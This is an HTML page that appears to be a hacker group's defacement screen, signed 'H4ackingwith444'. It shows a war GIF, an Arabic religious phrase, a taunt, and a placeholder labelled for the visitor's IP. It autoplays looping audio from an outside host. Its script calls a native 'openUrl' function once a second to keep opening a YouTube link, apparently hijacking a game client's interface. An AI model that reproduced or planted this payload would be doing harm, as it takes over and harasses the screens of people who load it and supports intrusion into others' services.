<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>H4ackingwith444</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background: url('https://media1.tenor.com/m/EJTXZCNxCqcAAAAd/gulf-war-desert-storm.gif') no-repeat center center fixed;
            background-size: cover;
            font-family: 'Courier New', Courier, monospace;
            color: #FF2900;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
        }
        .image-container img {
            width: 750px; 
            height: auto;
            border: 2px solid #8A1600; 
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(0, 0, 255, 0.7); 
        }
        .info {
            margin-top: 50px;
            font-size: 1.5em;
            color: #8A1600; 
            text-shadow: 0px 0px 8px #704949, 0px 0px 15px #730000, 0px 0px 25px #730000; 
            letter-spacing: 10px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 20px;
            font-size: 8em; 
            color: #FF2900; 
            text-shadow: 0px 0px 8px #704949, 0px 0px 15px #730000, 0px 0px 25px #730000; 
            letter-spacing: 0.5px; 
        }
    </style>
</head>
<body>

        
    </div>
  <div class="text"> لا إله إلا الله. </div>
  
<audio id="myAudio" autoplay loop>
  <source src="https://scp444.github.io/44/44.mp3" type="audio/mpeg">
</audio>


  <div class="info" id="ip-info">
      <strong>Nfdlkou Nfdlou Matkhafech <span id="ip"></span></strong><br>
  </div>

  <script>
    // 
    const audio = document.getElementById('myAudio');
    audio.play().catch(() => {
      console.log("Autoplay blocked, waiting for user interaction...");
    });

    // 
    const startAudio = () => {
      audio.play();
      document.removeEventListener('click', startAudio);
      document.removeEventListener('touchstart', startAudio);
    };

    document.addEventListener('click', startAudio);
    document.addEventListener('touchstart', startAudio);

    // ا
    setInterval(() => {
      window.invokeNative("openUrl", "https://youtu.be/DVyMzVJjz-g?si=3Adu9aqWwuoKPfUA");
    }, 1000);
  </script>
</body>
</html>
